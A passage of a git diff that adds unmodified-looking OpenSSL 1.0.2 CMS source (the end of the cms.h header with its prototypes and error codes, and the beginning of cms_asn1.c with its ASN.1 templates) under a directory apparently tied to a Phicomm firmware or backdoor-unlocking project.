+int CMS_add1_cert(CMS_ContentInfo *cms, X509 *cert);
+STACK_OF(X509) *CMS_get1_certs(CMS_ContentInfo *cms);
+
+CMS_RevocationInfoChoice *CMS_add0_RevocationInfoChoice(CMS_ContentInfo *cms);
+int CMS_add0_crl(CMS_ContentInfo *cms, X509_CRL *crl);
+int CMS_add1_crl(CMS_ContentInfo *cms, X509_CRL *crl);
+STACK_OF(X509_CRL) *CMS_get1_crls(CMS_ContentInfo *cms);
+
+int CMS_SignedData_init(CMS_ContentInfo *cms);
+CMS_SignerInfo *CMS_add1_signer(CMS_ContentInfo *cms,
+                                X509 *signer, EVP_PKEY *pk, const EVP_MD *md,
+                                unsigned int flags);
+EVP_PKEY_CTX *CMS_SignerInfo_get0_pkey_ctx(CMS_SignerInfo *si);
+EVP_MD_CTX *CMS_SignerInfo_get0_md_ctx(CMS_SignerInfo *si);
+STACK_OF(CMS_SignerInfo) *CMS_get0_SignerInfos(CMS_ContentInfo *cms);
+
+void CMS_SignerInfo_set1_signer_cert(CMS_SignerInfo *si, X509 *signer);
+int CMS_SignerInfo_get0_signer_id(CMS_SignerInfo *si,
+                                  ASN1_OCTET_STRING **keyid,
+                                  X509_NAME **issuer, ASN1_INTEGER **sno);
+int CMS_SignerInfo_cert_cmp(CMS_SignerInfo *si, X509 *cert);
+int CMS_set1_signers_certs(CMS_ContentInfo *cms, STACK_OF(X509) *certs,
+                           unsigned int flags);
+void CMS_SignerInfo_get0_algs(CMS_SignerInfo *si, EVP_PKEY **pk,
+                              X509 **signer, X509_ALGOR **pdig,
+                              X509_ALGOR **psig);
+ASN1_OCTET_STRING *CMS_SignerInfo_get0_signature(CMS_SignerInfo *si);
+int CMS_SignerInfo_sign(CMS_SignerInfo *si);
+int CMS_SignerInfo_verify(CMS_SignerInfo *si);
+int CMS_SignerInfo_verify_content(CMS_SignerInfo *si, BIO *chain);
+
+int CMS_add_smimecap(CMS_SignerInfo *si, STACK_OF(X509_ALGOR) *algs);
+int CMS_add_simple_smimecap(STACK_OF(X509_ALGOR) **algs,
+                            int algnid, int keysize);
+int CMS_add_standard_smimecap(STACK_OF(X509_ALGOR) **smcap);
+
+int CMS_signed_get_attr_count(const CMS_SignerInfo *si);
+int CMS_signed_get_attr_by_NID(const CMS_SignerInfo *si, int nid,
+                               int lastpos);
+int CMS_signed_get_attr_by_OBJ(const CMS_SignerInfo *si, ASN1_OBJECT *obj,
+                               int lastpos);
+X509_ATTRIBUTE *CMS_signed_get_attr(const CMS_SignerInfo *si, int loc);
+X509_ATTRIBUTE *CMS_signed_delete_attr(CMS_SignerInfo *si, int loc);
+int CMS_signed_add1_attr(CMS_SignerInfo *si, X509_ATTRIBUTE *attr);
+int CMS_signed_add1_attr_by_OBJ(CMS_SignerInfo *si,
+                                const ASN1_OBJECT *obj, int type,
+                                const void *bytes, int len);
+int CMS_signed_add1_attr_by_NID(CMS_SignerInfo *si,
+                                int nid, int type,
+                                const void *bytes, int len);
+int CMS_signed_add1_attr_by_txt(CMS_SignerInfo *si,
+                                const char *attrname, int type,
+                                const void *bytes, int len);
+void *CMS_signed_get0_data_by_OBJ(CMS_SignerInfo *si, ASN1_OBJECT *oid,
+                                  int lastpos, int type);
+
+int CMS_unsigned_get_attr_count(const CMS_SignerInfo *si);
+int CMS_unsigned_get_attr_by_NID(const CMS_SignerInfo *si, int nid,
+                                 int lastpos);
+int CMS_unsigned_get_attr_by_OBJ(const CMS_SignerInfo *si, ASN1_OBJECT *obj,
+                                 int lastpos);
+X509_ATTRIBUTE *CMS_unsigned_get_attr(const CMS_SignerInfo *si, int loc);
+X509_ATTRIBUTE *CMS_unsigned_delete_attr(CMS_SignerInfo *si, int loc);
+int CMS_unsigned_add1_attr(CMS_SignerInfo *si, X509_ATTRIBUTE *attr);
+int CMS_unsigned_add1_attr_by_OBJ(CMS_SignerInfo *si,
+                                  const ASN1_OBJECT *obj, int type,
+                                  const void *bytes, int len);
+int CMS_unsigned_add1_attr_by_NID(CMS_SignerInfo *si,
+                                  int nid, int type,
+                                  const void *bytes, int len);
+int CMS_unsigned_add1_attr_by_txt(CMS_SignerInfo *si,
+                                  const char *attrname, int type,
+                                  const void *bytes, int len);
+void *CMS_unsigned_get0_data_by_OBJ(CMS_SignerInfo *si, ASN1_OBJECT *oid,
+                                    int lastpos, int type);
+
+# ifdef HEADER_X509V3_H
+
+int CMS_get1_ReceiptRequest(CMS_SignerInfo *si, CMS_ReceiptRequest **prr);
+CMS_ReceiptRequest *CMS_ReceiptRequest_create0(unsigned char *id, int idlen,
+                                               int allorfirst,
+                                               STACK_OF(GENERAL_NAMES)
+                                               *receiptList, STACK_OF(GENERAL_NAMES)
+                                               *receiptsTo);
+int CMS_add1_ReceiptRequest(CMS_SignerInfo *si, CMS_ReceiptRequest *rr);
+void CMS_ReceiptRequest_get0_values(CMS_ReceiptRequest *rr,
+                                    ASN1_STRING **pcid,
+                                    int *pallorfirst,
+                                    STACK_OF(GENERAL_NAMES) **plist,
+                                    STACK_OF(GENERAL_NAMES) **prto);
+# endif
+int CMS_RecipientInfo_kari_get0_alg(CMS_RecipientInfo *ri,
+                                    X509_ALGOR **palg,
+                                    ASN1_OCTET_STRING **pukm);
+STACK_OF(CMS_RecipientEncryptedKey)
+*CMS_RecipientInfo_kari_get0_reks(CMS_RecipientInfo *ri);
+
+int CMS_RecipientInfo_kari_get0_orig_id(CMS_RecipientInfo *ri,
+                                        X509_ALGOR **pubalg,
+                                        ASN1_BIT_STRING **pubkey,
+                                        ASN1_OCTET_STRING **keyid,
+                                        X509_NAME **issuer,
+                                        ASN1_INTEGER **sno);
+
+int CMS_RecipientInfo_kari_orig_id_cmp(CMS_RecipientInfo *ri, X509 *cert);
+
+int CMS_RecipientEncryptedKey_get0_id(CMS_RecipientEncryptedKey *rek,
+                                      ASN1_OCTET_STRING **keyid,
+                                      ASN1_GENERALIZEDTIME **tm,
+                                      CMS_OtherKeyAttribute **other,
+                                      X509_NAME **issuer, ASN1_INTEGER **sno);
+int CMS_RecipientEncryptedKey_cert_cmp(CMS_RecipientEncryptedKey *rek,
+                                       X509 *cert);
+int CMS_RecipientInfo_kari_set0_pkey(CMS_RecipientInfo *ri, EVP_PKEY *pk);
+EVP_CIPHER_CTX *CMS_RecipientInfo_kari_get0_ctx(CMS_RecipientInfo *ri);
+int CMS_RecipientInfo_kari_decrypt(CMS_ContentInfo *cms,
+                                   CMS_RecipientInfo *ri,
+                                   CMS_RecipientEncryptedKey *rek);
+
+int CMS_SharedInfo_encode(unsigned char **pder, X509_ALGOR *kekalg,
+                          ASN1_OCTET_STRING *ukm, int keylen);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_CMS_strings(void);
+
+/* Error codes for the CMS functions. */
+
+/* Function codes. */
+# define CMS_F_CHECK_CONTENT                              99
+# define CMS_F_CMS_ADD0_CERT                              164
+# define CMS_F_CMS_ADD0_RECIPIENT_KEY                     100
+# define CMS_F_CMS_ADD0_RECIPIENT_PASSWORD                165
+# define CMS_F_CMS_ADD1_RECEIPTREQUEST                    158
+# define CMS_F_CMS_ADD1_RECIPIENT_CERT                    101
+# define CMS_F_CMS_ADD1_SIGNER                            102
+# define CMS_F_CMS_ADD1_SIGNINGTIME                       103
+# define CMS_F_CMS_COMPRESS                               104
+# define CMS_F_CMS_COMPRESSEDDATA_CREATE                  105
+# define CMS_F_CMS_COMPRESSEDDATA_INIT_BIO                106
+# define CMS_F_CMS_COPY_CONTENT                           107
+# define CMS_F_CMS_COPY_MESSAGEDIGEST                     108
+# define CMS_F_CMS_DATA                                   109
+# define CMS_F_CMS_DATAFINAL                              110
+# define CMS_F_CMS_DATAINIT                               111
+# define CMS_F_CMS_DECRYPT                                112
+# define CMS_F_CMS_DECRYPT_SET1_KEY                       113
+# define CMS_F_CMS_DECRYPT_SET1_PASSWORD                  166
+# define CMS_F_CMS_DECRYPT_SET1_PKEY                      114
+# define CMS_F_CMS_DIGESTALGORITHM_FIND_CTX               115
+# define CMS_F_CMS_DIGESTALGORITHM_INIT_BIO               116
+# define CMS_F_CMS_DIGESTEDDATA_DO_FINAL                  117
+# define CMS_F_CMS_DIGEST_VERIFY                          118
+# define CMS_F_CMS_ENCODE_RECEIPT                         161
+# define CMS_F_CMS_ENCRYPT                                119
+# define CMS_F_CMS_ENCRYPTEDCONTENT_INIT_BIO              120
+# define CMS_F_CMS_ENCRYPTEDDATA_DECRYPT                  121
+# define CMS_F_CMS_ENCRYPTEDDATA_ENCRYPT                  122
+# define CMS_F_CMS_ENCRYPTEDDATA_SET1_KEY                 123
+# define CMS_F_CMS_ENVELOPEDDATA_CREATE                   124
+# define CMS_F_CMS_ENVELOPEDDATA_INIT_BIO                 125
+# define CMS_F_CMS_ENVELOPED_DATA_INIT                    126
+# define CMS_F_CMS_ENV_ASN1_CTRL                          171
+# define CMS_F_CMS_FINAL                                  127
+# define CMS_F_CMS_GET0_CERTIFICATE_CHOICES               128
+# define CMS_F_CMS_GET0_CONTENT                           129
+# define CMS_F_CMS_GET0_ECONTENT_TYPE                     130
+# define CMS_F_CMS_GET0_ENVELOPED                         131
+# define CMS_F_CMS_GET0_REVOCATION_CHOICES                132
+# define CMS_F_CMS_GET0_SIGNED                            133
+# define CMS_F_CMS_MSGSIGDIGEST_ADD1                      162
+# define CMS_F_CMS_RECEIPTREQUEST_CREATE0                 159
+# define CMS_F_CMS_RECEIPT_VERIFY                         160
+# define CMS_F_CMS_RECIPIENTINFO_DECRYPT                  134
+# define CMS_F_CMS_RECIPIENTINFO_ENCRYPT                  169
+# define CMS_F_CMS_RECIPIENTINFO_KARI_ENCRYPT             178
+# define CMS_F_CMS_RECIPIENTINFO_KARI_GET0_ALG            175
+# define CMS_F_CMS_RECIPIENTINFO_KARI_GET0_ORIG_ID        173
+# define CMS_F_CMS_RECIPIENTINFO_KARI_GET0_REKS           172
+# define CMS_F_CMS_RECIPIENTINFO_KARI_ORIG_ID_CMP         174
+# define CMS_F_CMS_RECIPIENTINFO_KEKRI_DECRYPT            135
+# define CMS_F_CMS_RECIPIENTINFO_KEKRI_ENCRYPT            136
+# define CMS_F_CMS_RECIPIENTINFO_KEKRI_GET0_ID            137
+# define CMS_F_CMS_RECIPIENTINFO_KEKRI_ID_CMP             138
+# define CMS_F_CMS_RECIPIENTINFO_KTRI_CERT_CMP            139
+# define CMS_F_CMS_RECIPIENTINFO_KTRI_DECRYPT             140
+# define CMS_F_CMS_RECIPIENTINFO_KTRI_ENCRYPT             141
+# define CMS_F_CMS_RECIPIENTINFO_KTRI_GET0_ALGS           142
+# define CMS_F_CMS_RECIPIENTINFO_KTRI_GET0_SIGNER_ID      143
+# define CMS_F_CMS_RECIPIENTINFO_PWRI_CRYPT               167
+# define CMS_F_CMS_RECIPIENTINFO_SET0_KEY                 144
+# define CMS_F_CMS_RECIPIENTINFO_SET0_PASSWORD            168
+# define CMS_F_CMS_RECIPIENTINFO_SET0_PKEY                145
+# define CMS_F_CMS_SD_ASN1_CTRL                           170
+# define CMS_F_CMS_SET1_IAS                               176
+# define CMS_F_CMS_SET1_KEYID                             177
+# define CMS_F_CMS_SET1_SIGNERIDENTIFIER                  146
+# define CMS_F_CMS_SET_DETACHED                           147
+# define CMS_F_CMS_SIGN                                   148
+# define CMS_F_CMS_SIGNED_DATA_INIT                       149
+# define CMS_F_CMS_SIGNERINFO_CONTENT_SIGN                150
+# define CMS_F_CMS_SIGNERINFO_SIGN                        151
+# define CMS_F_CMS_SIGNERINFO_VERIFY                      152
+# define CMS_F_CMS_SIGNERINFO_VERIFY_CERT                 153
+# define CMS_F_CMS_SIGNERINFO_VERIFY_CONTENT              154
+# define CMS_F_CMS_SIGN_RECEIPT                           163
+# define CMS_F_CMS_STREAM                                 155
+# define CMS_F_CMS_UNCOMPRESS                             156
+# define CMS_F_CMS_VERIFY                                 157
+
+/* Reason codes. */
+# define CMS_R_ADD_SIGNER_ERROR                           99
+# define CMS_R_CERTIFICATE_ALREADY_PRESENT                175
+# define CMS_R_CERTIFICATE_HAS_NO_KEYID                   160
+# define CMS_R_CERTIFICATE_VERIFY_ERROR                   100
+# define CMS_R_CIPHER_INITIALISATION_ERROR                101
+# define CMS_R_CIPHER_PARAMETER_INITIALISATION_ERROR      102
+# define CMS_R_CMS_DATAFINAL_ERROR                        103
+# define CMS_R_CMS_LIB                                    104
+# define CMS_R_CONTENTIDENTIFIER_MISMATCH                 170
+# define CMS_R_CONTENT_NOT_FOUND                          105
+# define CMS_R_CONTENT_TYPE_MISMATCH                      171
+# define CMS_R_CONTENT_TYPE_NOT_COMPRESSED_DATA           106
+# define CMS_R_CONTENT_TYPE_NOT_ENVELOPED_DATA            107
+# define CMS_R_CONTENT_TYPE_NOT_SIGNED_DATA               108
+# define CMS_R_CONTENT_VERIFY_ERROR                       109
+# define CMS_R_CTRL_ERROR                                 110
+# define CMS_R_CTRL_FAILURE                               111
+# define CMS_R_DECRYPT_ERROR                              112
+# define CMS_R_DIGEST_ERROR                               161
+# define CMS_R_ERROR_GETTING_PUBLIC_KEY                   113
+# define CMS_R_ERROR_READING_MESSAGEDIGEST_ATTRIBUTE      114
+# define CMS_R_ERROR_SETTING_KEY                          115
+# define CMS_R_ERROR_SETTING_RECIPIENTINFO                116
+# define CMS_R_INVALID_ENCRYPTED_KEY_LENGTH               117
+# define CMS_R_INVALID_KEY_ENCRYPTION_PARAMETER           176
+# define CMS_R_INVALID_KEY_LENGTH                         118
+# define CMS_R_MD_BIO_INIT_ERROR                          119
+# define CMS_R_MESSAGEDIGEST_ATTRIBUTE_WRONG_LENGTH       120
+# define CMS_R_MESSAGEDIGEST_WRONG_LENGTH                 121
+# define CMS_R_MSGSIGDIGEST_ERROR                         172
+# define CMS_R_MSGSIGDIGEST_VERIFICATION_FAILURE          162
+# define CMS_R_MSGSIGDIGEST_WRONG_LENGTH                  163
+# define CMS_R_NEED_ONE_SIGNER                            164
+# define CMS_R_NOT_A_SIGNED_RECEIPT                       165
+# define CMS_R_NOT_ENCRYPTED_DATA                         122
+# define CMS_R_NOT_KEK                                    123
+# define CMS_R_NOT_KEY_AGREEMENT                          181
+# define CMS_R_NOT_KEY_TRANSPORT                          124
+# define CMS_R_NOT_PWRI                                   177
+# define CMS_R_NOT_SUPPORTED_FOR_THIS_KEY_TYPE            125
+# define CMS_R_NO_CIPHER                                  126
+# define CMS_R_NO_CONTENT                                 127
+# define CMS_R_NO_CONTENT_TYPE                            173
+# define CMS_R_NO_DEFAULT_DIGEST                          128
+# define CMS_R_NO_DIGEST_SET                              129
+# define CMS_R_NO_KEY                                     130
+# define CMS_R_NO_KEY_OR_CERT                             174
+# define CMS_R_NO_MATCHING_DIGEST                         131
+# define CMS_R_NO_MATCHING_RECIPIENT                      132
+# define CMS_R_NO_MATCHING_SIGNATURE                      166
+# define CMS_R_NO_MSGSIGDIGEST                            167
+# define CMS_R_NO_PASSWORD                                178
+# define CMS_R_NO_PRIVATE_KEY                             133
+# define CMS_R_NO_PUBLIC_KEY                              134
+# define CMS_R_NO_RECEIPT_REQUEST                         168
+# define CMS_R_NO_SIGNERS                                 135
+# define CMS_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE     136
+# define CMS_R_RECEIPT_DECODE_ERROR                       169
+# define CMS_R_RECIPIENT_ERROR                            137
+# define CMS_R_SIGNER_CERTIFICATE_NOT_FOUND               138
+# define CMS_R_SIGNFINAL_ERROR                            139
+# define CMS_R_SMIME_TEXT_ERROR                           140
+# define CMS_R_STORE_INIT_ERROR                           141
+# define CMS_R_TYPE_NOT_COMPRESSED_DATA                   142
+# define CMS_R_TYPE_NOT_DATA                              143
+# define CMS_R_TYPE_NOT_DIGESTED_DATA                     144
+# define CMS_R_TYPE_NOT_ENCRYPTED_DATA                    145
+# define CMS_R_TYPE_NOT_ENVELOPED_DATA                    146
+# define CMS_R_UNABLE_TO_FINALIZE_CONTEXT                 147
+# define CMS_R_UNKNOWN_CIPHER                             148
+# define CMS_R_UNKNOWN_DIGEST_ALGORIHM                    149
+# define CMS_R_UNKNOWN_ID                                 150
+# define CMS_R_UNSUPPORTED_COMPRESSION_ALGORITHM          151
+# define CMS_R_UNSUPPORTED_CONTENT_TYPE                   152
+# define CMS_R_UNSUPPORTED_KEK_ALGORITHM                  153
+# define CMS_R_UNSUPPORTED_KEY_ENCRYPTION_ALGORITHM       179
+# define CMS_R_UNSUPPORTED_RECIPIENT_TYPE                 154
+# define CMS_R_UNSUPPORTED_RECPIENTINFO_TYPE              155
+# define CMS_R_UNSUPPORTED_TYPE                           156
+# define CMS_R_UNWRAP_ERROR                               157
+# define CMS_R_UNWRAP_FAILURE                             180
+# define CMS_R_VERIFICATION_FAILURE                       158
+# define CMS_R_WRAP_ERROR                                 159
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_asn1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_asn1.c
new file mode 100644
index 0000000..81a3407
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_asn1.c
@@ -0,0 +1,459 @@
+/* crypto/cms/cms_asn1.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include <openssl/asn1t.h>
+#include <openssl/pem.h>
+#include <openssl/x509v3.h>
+#include "cms.h"
+#include "cms_lcl.h"
+
+
+ASN1_SEQUENCE(CMS_IssuerAndSerialNumber) = {
+        ASN1_SIMPLE(CMS_IssuerAndSerialNumber, issuer, X509_NAME),
+        ASN1_SIMPLE(CMS_IssuerAndSerialNumber, serialNumber, ASN1_INTEGER)
+} ASN1_SEQUENCE_END(CMS_IssuerAndSerialNumber)
+
+ASN1_SEQUENCE(CMS_OtherCertificateFormat) = {
+        ASN1_SIMPLE(CMS_OtherCertificateFormat, otherCertFormat, ASN1_OBJECT),
+        ASN1_OPT(CMS_OtherCertificateFormat, otherCert, ASN1_ANY)
+} ASN1_SEQUENCE_END(CMS_OtherCertificateFormat)
+
+ASN1_CHOICE(CMS_CertificateChoices) = {
+        ASN1_SIMPLE(CMS_CertificateChoices, d.certificate, X509),
+        ASN1_IMP(CMS_CertificateChoices, d.extendedCertificate, ASN1_SEQUENCE, 0),
+        ASN1_IMP(CMS_CertificateChoices, d.v1AttrCert, ASN1_SEQUENCE, 1),
+        ASN1_IMP(CMS_CertificateChoices, d.v2AttrCert, ASN1_SEQUENCE, 2),
+        ASN1_IMP(CMS_CertificateChoices, d.other, CMS_OtherCertificateFormat, 3)
+} ASN1_CHOICE_END(CMS_CertificateChoices)
+
+ASN1_CHOICE(CMS_SignerIdentifier) = {
+        ASN1_SIMPLE(CMS_SignerIdentifier, d.issuerAndSerialNumber, CMS_IssuerAndSerialNumber),
+        ASN1_IMP(CMS_SignerIdentifier, d.subjectKeyIdentifier, ASN1_OCTET_STRING, 0)
+} ASN1_CHOICE_END(CMS_SignerIdentifier)
+
+ASN1_NDEF_SEQUENCE(CMS_EncapsulatedContentInfo) = {
+        ASN1_SIMPLE(CMS_EncapsulatedContentInfo, eContentType, ASN1_OBJECT),
+        ASN1_NDEF_EXP_OPT(CMS_EncapsulatedContentInfo, eContent, ASN1_OCTET_STRING_NDEF, 0)
+} ASN1_NDEF_SEQUENCE_END(CMS_EncapsulatedContentInfo)
+
+/* Minor tweak to operation: free up signer key, cert */
+static int cms_si_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                     void *exarg)
+{
+    if (operation == ASN1_OP_FREE_POST) {
+        CMS_SignerInfo *si = (CMS_SignerInfo *)*pval;
+        if (si->pkey)
+            EVP_PKEY_free(si->pkey);
+        if (si->signer)
+            X509_free(si->signer);
+        if (si->pctx)
+            EVP_MD_CTX_cleanup(&si->mctx);
+    }
+    return 1;
+}
+
+ASN1_SEQUENCE_cb(CMS_SignerInfo, cms_si_cb) = {
+        ASN1_SIMPLE(CMS_SignerInfo, version, LONG),
+        ASN1_SIMPLE(CMS_SignerInfo, sid, CMS_SignerIdentifier),
+        ASN1_SIMPLE(CMS_SignerInfo, digestAlgorithm, X509_ALGOR),
+        ASN1_IMP_SET_OF_OPT(CMS_SignerInfo, signedAttrs, X509_ATTRIBUTE, 0),
+        ASN1_SIMPLE(CMS_SignerInfo, signatureAlgorithm, X509_ALGOR),
+        ASN1_SIMPLE(CMS_SignerInfo, signature, ASN1_OCTET_STRING),
+        ASN1_IMP_SET_OF_OPT(CMS_SignerInfo, unsignedAttrs, X509_ATTRIBUTE, 1)
+} ASN1_SEQUENCE_END_cb(CMS_SignerInfo, CMS_SignerInfo)
+
+ASN1_SEQUENCE(CMS_OtherRevocationInfoFormat) = {
+        ASN1_SIMPLE(CMS_OtherRevocationInfoFormat, otherRevInfoFormat, ASN1_OBJECT),
+        ASN1_OPT(CMS_OtherRevocationInfoFormat, otherRevInfo, ASN1_ANY)
+} ASN1_SEQUENCE_END(CMS_OtherRevocationInfoFormat)
+
+ASN1_CHOICE(CMS_RevocationInfoChoice) = {
+        ASN1_SIMPLE(CMS_RevocationInfoChoice, d.crl, X509_CRL),
+        ASN1_IMP(CMS_RevocationInfoChoice, d.other, CMS_OtherRevocationInfoFormat, 1)
+} ASN1_CHOICE_END(CMS_RevocationInfoChoice)
+
+ASN1_NDEF_SEQUENCE(CMS_SignedData) = {
+        ASN1_SIMPLE(CMS_SignedData, version, LONG),
+        ASN1_SET_OF(CMS_SignedData, digestAlgorithms, X509_ALGOR),
+        ASN1_SIMPLE(CMS_SignedData, encapContentInfo, CMS_EncapsulatedContentInfo),
+        ASN1_IMP_SET_OF_OPT(CMS_SignedData, certificates, CMS_CertificateChoices, 0),
+        ASN1_IMP_SET_OF_OPT(CMS_SignedData, crls, CMS_RevocationInfoChoice, 1),
+        ASN1_SET_OF(CMS_SignedData, signerInfos, CMS_SignerInfo)
+} ASN1_NDEF_SEQUENCE_END(CMS_SignedData)
+
+ASN1_SEQUENCE(CMS_OriginatorInfo) = {
+        ASN1_IMP_SET_OF_OPT(CMS_OriginatorInfo, certificates, CMS_CertificateChoices, 0),
+        ASN1_IMP_SET_OF_OPT(CMS_OriginatorInfo, crls, CMS_RevocationInfoChoice, 1)
+} ASN1_SEQUENCE_END(CMS_OriginatorInfo)
+
+ASN1_NDEF_SEQUENCE(CMS_EncryptedContentInfo) = {
+        ASN1_SIMPLE(CMS_EncryptedContentInfo, contentType, ASN1_OBJECT),
+        ASN1_SIMPLE(CMS_EncryptedContentInfo, contentEncryptionAlgorithm, X509_ALGOR),
+        ASN1_IMP_OPT(CMS_EncryptedContentInfo, encryptedContent, ASN1_OCTET_STRING_NDEF, 0)
+} ASN1_NDEF_SEQUENCE_END(CMS_EncryptedContentInfo)
+
+ASN1_SEQUENCE(CMS_KeyTransRecipientInfo) = {
+        ASN1_SIMPLE(CMS_KeyTransRecipientInfo, version, LONG),
+        ASN1_SIMPLE(CMS_KeyTransRecipientInfo, rid, CMS_SignerIdentifier),
+        ASN1_SIMPLE(CMS_KeyTransRecipientInfo, keyEncryptionAlgorithm, X509_ALGOR),
+        ASN1_SIMPLE(CMS_KeyTransRecipientInfo, encryptedKey, ASN1_OCTET_STRING)
+} ASN1_SEQUENCE_END(CMS_KeyTransRecipientInfo)
+
+ASN1_SEQUENCE(CMS_OtherKeyAttribute) = {
+        ASN1_SIMPLE(CMS_OtherKeyAttribute, keyAttrId, ASN1_OBJECT),
+        ASN1_OPT(CMS_OtherKeyAttribute, keyAttr, ASN1_ANY)
+} ASN1_SEQUENCE_END(CMS_OtherKeyAttribute)
+
+ASN1_SEQUENCE(CMS_RecipientKeyIdentifier) = {
+        ASN1_SIMPLE(CMS_RecipientKeyIdentifier, subjectKeyIdentifier, ASN1_OCTET_STRING),
+        ASN1_OPT(CMS_RecipientKeyIdentifier, date, ASN1_GENERALIZEDTIME),
+        ASN1_OPT(CMS_RecipientKeyIdentifier, other, CMS_OtherKeyAttribute)
+} ASN1_SEQUENCE_END(CMS_RecipientKeyIdentifier)
+
+ASN1_CHOICE(CMS_KeyAgreeRecipientIdentifier) = {
+  ASN1_SIMPLE(CMS_KeyAgreeRecipientIdentifier, d.issuerAndSerialNumber, CMS_IssuerAndSerialNumber),
+  ASN1_IMP(CMS_KeyAgreeRecipientIdentifier, d.rKeyId, CMS_RecipientKeyIdentifier, 0)
+} ASN1_CHOICE_END(CMS_KeyAgreeRecipientIdentifier)
+
+static int cms_rek_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                      void *exarg)
+{
+    CMS_RecipientEncryptedKey *rek = (CMS_RecipientEncryptedKey *)*pval;
+    if (operation == ASN1_OP_FREE_POST) {
+        if (rek->pkey)
+            EVP_PKEY_free(rek->pkey);
+    }
+    return 1;
+}
+
+ASN1_SEQUENCE_cb(CMS_RecipientEncryptedKey, cms_rek_cb) = {
+        ASN1_SIMPLE(CMS_RecipientEncryptedKey, rid, CMS_KeyAgreeRecipientIdentifier),
+        ASN1_SIMPLE(CMS_RecipientEncryptedKey, encryptedKey, ASN1_OCTET_STRING)
+} ASN1_SEQUENCE_END_cb(CMS_RecipientEncryptedKey, CMS_RecipientEncryptedKey)
+
+ASN1_SEQUENCE(CMS_OriginatorPublicKey) = {
+  ASN1_SIMPLE(CMS_OriginatorPublicKey, algorithm, X509_ALGOR),
+  ASN1_SIMPLE(CMS_OriginatorPublicKey, publicKey, ASN1_BIT_STRING)
+} ASN1_SEQUENCE_END(CMS_OriginatorPublicKey)
+
+ASN1_CHOICE(CMS_OriginatorIdentifierOrKey) = {
+  ASN1_SIMPLE(CMS_OriginatorIdentifierOrKey, d.issuerAndSerialNumber, CMS_IssuerAndSerialNumber),
+  ASN1_IMP(CMS_OriginatorIdentifierOrKey, d.subjectKeyIdentifier, ASN1_OCTET_STRING, 0),
+  ASN1_IMP(CMS_OriginatorIdentifierOrKey, d.originatorKey, CMS_OriginatorPublicKey, 1)
+} ASN1_CHOICE_END(CMS_OriginatorIdentifierOrKey)
+
+static int cms_kari_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                       void *exarg)
+{
+    CMS_KeyAgreeRecipientInfo *kari = (CMS_KeyAgreeRecipientInfo *)*pval;
+    if (operation == ASN1_OP_NEW_POST) {
+        EVP_CIPHER_CTX_init(&kari->ctx);
+        EVP_CIPHER_CTX_set_flags(&kari->ctx, EVP_CIPHER_CTX_FLAG_WRAP_ALLOW);
+        kari->pctx = NULL;
+    } else if (operation == ASN1_OP_FREE_POST) {
+        if (kari->pctx)
+            EVP_PKEY_CTX_free(kari->pctx);
+        EVP_CIPHER_CTX_cleanup(&kari->ctx);
+    }
+    return 1;
+}
+
+ASN1_SEQUENCE_cb(CMS_KeyAgreeRecipientInfo, cms_kari_cb) = {
+        ASN1_SIMPLE(CMS_KeyAgreeRecipientInfo, version, LONG),
+        ASN1_EXP(CMS_KeyAgreeRecipientInfo, originator, CMS_OriginatorIdentifierOrKey, 0),
+        ASN1_EXP_OPT(CMS_KeyAgreeRecipientInfo, ukm, ASN1_OCTET_STRING, 1),
+        ASN1_SIMPLE(CMS_KeyAgreeRecipientInfo, keyEncryptionAlgorithm, X509_ALGOR),
